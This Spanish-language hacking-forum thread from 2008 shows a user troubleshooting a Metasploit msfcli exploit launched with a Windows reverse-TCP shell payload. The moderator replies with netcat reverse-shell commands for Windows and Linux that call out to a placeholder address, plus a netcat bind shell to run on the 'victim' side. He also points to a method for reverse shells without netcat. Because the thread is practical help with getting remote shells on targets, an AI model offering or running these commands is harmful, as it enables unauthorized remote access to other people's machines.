elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 09:14  


Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Consulta msfcli gracias...		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Consulta msfcli gracias...  (Leído 2,206 veces)
visualfree

Desconectado Desconectado

Mensajes: 143


Ver Perfil
Consulta msfcli gracias...
« en: 15 Noviembre 2008, 06:58 »
 ./msfcli exploit  PAYLOAD=windows/shell_reverse_tcp RHOST=ipremota LHOST=iplocal RPORT=puertoremoto LPORT=puertolocal    E


se queda en esto :
  • Triggering the vulnerability...
**************************************

uso el msfcli de la siguiente forma al usar shell reverse tcp debo dejar el nectat a la escucha?

porque con el msfconsole me funciona de maravillas...

si alguien sabe me diria porfavor que ya he buscado por todos lados ....
En línea
berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.140



Ver Perfil
Re: Consulta msfcli gracias...
« Respuesta #1 en: 15 Noviembre 2008, 07:10 »
No veo data insertada en los campos como RHOST= LHOST etc etc, para el shell reverse , primero intenta hacer el bind a un port para compribar la vulnerabilidad, despues intentas el reverse con netcat:

Win32
Código:
C:\>nc -d -e cmd.exe 80 1.2.3.4

Linux
Código:
# nc -d -e /usr/bin/bash 80 1.2.3.4

-berz3k
En línea
visualfree

Desconectado Desconectado

Mensajes: 143


Ver Perfil
Re: Consulta msfcli gracias...
« Respuesta #2 en: 15 Noviembre 2008, 07:34 »
el -d en linux invalid option
En línea
berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.140



Ver Perfil
Re: Consulta msfcli gracias...
« Respuesta #3 en: 15 Noviembre 2008, 12:33 »
Hay un firewall que no te permite conectarte a la "victima" o por que el reverse ? si lo haces normal ? yo intentaria algo de lado de la victima:

Código:
$ nc -v -e ‘/bin/bash’ -l -p 9090 -t

Aunque muchas veces el reverse se "frezeea" , pero hay otros metodos para hacer reverse sin necesidad de netcat

Reverse Shell Without Enabling Netcat
:http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2008-09/msg00410.html


-berz3k.

« Última modificación: 15 Noviembre 2008, 12:45 por berz3k » En línea
Jarmen Kell

Desconectado Desconectado

Mensajes: 37



Ver Perfil WWW
Re: Consulta msfcli gracias...
« Respuesta #4 en: 7 Enero 2009, 11:55 »
el -d en linux invalid option

en linux no es -D mayuscula??, me suena  ;D
« Última modificación: 7 Enero 2009, 13:08 por Jarmen Kell » En línea
R00T@LinuX# ps -e | grep bill
 5446 ?        00:00:00 bill-gates
R00T@LinuX# kill -9 5446 INMEDIATAMENTE!!!
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines